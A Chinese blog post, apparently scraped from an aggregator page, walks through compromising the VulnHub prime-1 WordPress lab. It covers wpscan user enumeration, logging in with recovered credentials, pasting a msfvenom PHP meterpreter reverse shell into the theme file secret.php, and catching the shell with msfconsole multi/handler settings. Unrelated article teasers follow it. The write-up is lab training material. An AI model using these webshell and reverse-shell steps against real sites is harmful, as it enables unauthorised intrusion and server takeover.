news 2026/7/7 9:32:53

kali反弹连接wordpress靶场详细教程

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
kali反弹连接wordpress靶场详细教程

前言

本次实战通过prime靶场进行操作,从寻找测试点和getshell,对各项步骤进行详细记录,以方便参考

接上一篇文章https://blog.csdn.net/qq_66136699/article/details/155752517?fromshare=blogdetail&sharetype=blogdetail&sharerId=155752517&sharerefer=PC&sharesource=qq_66136699&sharefrom=from_link

目录

一、反弹连接是什么?

二、使用步骤

1.准备工作

2.实战操作

①登录网站

②指纹识别

③尝试登录​编辑

④寻找上传点

⑥构建shell代码

⑦创建监听通道

⑧反弹shell

总结


一、反弹连接是什么?

简单来说就是黑客控制了目标,并建立了监听的端口,以及构建了一个可以访问的后门,这里的反弹连接是在通过在后台服务端上传木马,当客户端访问带有木马的页面时,攻击机通过监听的端口获取到了系统的shell,获得了执行命令的权限

二、使用步骤

1.准备工作

使用靶场:vulnhub-prime-1

攻击机版本:kali2025.03、

在前面的信息收集环节我们获取到了靶场 wordpress 的账号和密码

url:http://192.168.12.134/wordpress/

密码:follow_the_ippsec

2.实战操作

①登录网站

访问 wordpress 后台的url,并找到 login in 关键词

点击进去发现是一个登录页面

②指纹识别

回到 kali 攻击机对网站做一个指纹识别

wpscan --url http://192.168.12.134/wordpress/ --enumerate u

参数说明:--url 指定识别的网站地址,-enumerate u: 枚举用户名

结果显示发现了一个已注册的用户名

目前掌握的重要信息

账户:victor

密码:follow_the_ippsec

③尝试登录

登录成功!!

④寻找上传点

wordpress有一个功能,可以在系统内部编辑代码,思路是找到其中可以编辑的代码框,并上传带有反弹shell木马的代码,位置以标出

我找到的可编辑文件是 secret.php,

⑥构建shell代码

回到kali,利用 msfvenom构建php反弹连接的代码

输入这一串指令,我的 kali ip地址为:192.168.12.128

构建成功后cat查看代码并复制,开头的 / *就不用了复制了

粘贴到 wordpress 中 secret.php,并上传更新

⑦创建监听通道

回到kali,需要设置一些参数来建立监听连接

msfconsole

使用 msf 控制终端

输入以下参数,确保与 msfvenom 构建的反弹shell的文件参数一致

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.12.128

set lport 7777

⑧反弹shell

exploit 开始监听端口,并等待反弹shell

根据wordpress的项目目录结构,可以确定 secret.php 文件在下面这个位置

为方便学习最好自己搞一套wordpress的源码研究

回车!!再回到 kali 反弹连接 shell 成功。

可以再上面输入一些简单命令,也就是说初步获取到了靶机执行命令权限


总结

本文简单介绍了反弹shell进行连接的使用,使用了msf工具构建了带有木马的shell代码,经过一层层得到信息收集和测试,最终获取到了服务端shell执行命令的权限。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/7 11:54:04

Top 5 VSCode量子电路插件推荐(2024最新权威榜单)

第一章:Top 5 VSCode量子电路插件全景概览随着量子计算的快速发展,开发者对高效开发工具的需求日益增长。Visual Studio Code 凭借其强大的扩展生态,已成为量子编程的重要平台。以下五款插件为量子电路设计、模拟与调试提供了全面支持&#x…

作者头像 李华
网站建设 2026/7/7 19:00:02

【医疗系统数据安全实战】:C#加密技术全解析与核心代码实现

第一章:医疗系统数据安全概述在数字化转型加速的背景下,医疗系统正日益依赖电子健康记录(EHR)、远程诊疗平台和云端数据存储。这些技术提升了医疗服务效率,但也使患者敏感信息面临前所未有的安全威胁。医疗数据包含个人…

作者头像 李华
网站建设 2026/7/7 7:14:17

10、代理与防火墙:常见漏洞揭秘

代理与防火墙:常见漏洞揭秘 在网络安全领域,代理和防火墙是至关重要的边界保护机制。代理作为用户网络浏览器与互联网服务器之间的桥梁,而防火墙则通过实施安全策略来控制网络访问。下面我们将详细探讨几种常见产品的漏洞情况。 代理与防火墙基础 代理 :是一种计算机程…

作者头像 李华
网站建设 2026/7/7 19:11:05

Creed —— 战斗系统

目录 一,导入并设置动画 二,创建输入动作 三,创建AnimNotify 四,创建actor component 一,导入并设置动画 导入动画,并创建动画蒙太奇; 二,创建输入动作 在内容浏览器内&#xff…

作者头像 李华
网站建设 2026/7/7 8:58:20

Wan2.2-T2V-A14B在艺术展览导览视频中的沉浸式体验构建

Wan2.2-T2V-A14B:当AI为艺术展览注入“呼吸感” 你有没有过这样的体验?站在一幅古画前,看着山川流水、人物舟楫,心里却忍不住想:“如果这画面能动起来就好了——那渔夫撑篙的节奏、风吹柳枝的弧度、云雾在峰间游走的样…

作者头像 李华
网站建设 2026/7/7 7:12:25

LMMS音频插件完全指南:从入门到精通的格式选择策略

LMMS音频插件完全指南:从入门到精通的格式选择策略 【免费下载链接】lmms Cross-platform music production software 项目地址: https://gitcode.com/gh_mirrors/lm/lmms 想要在LMMS音乐制作软件中实现专业级的音频处理效果?插件格式的选择往往是…

作者头像 李华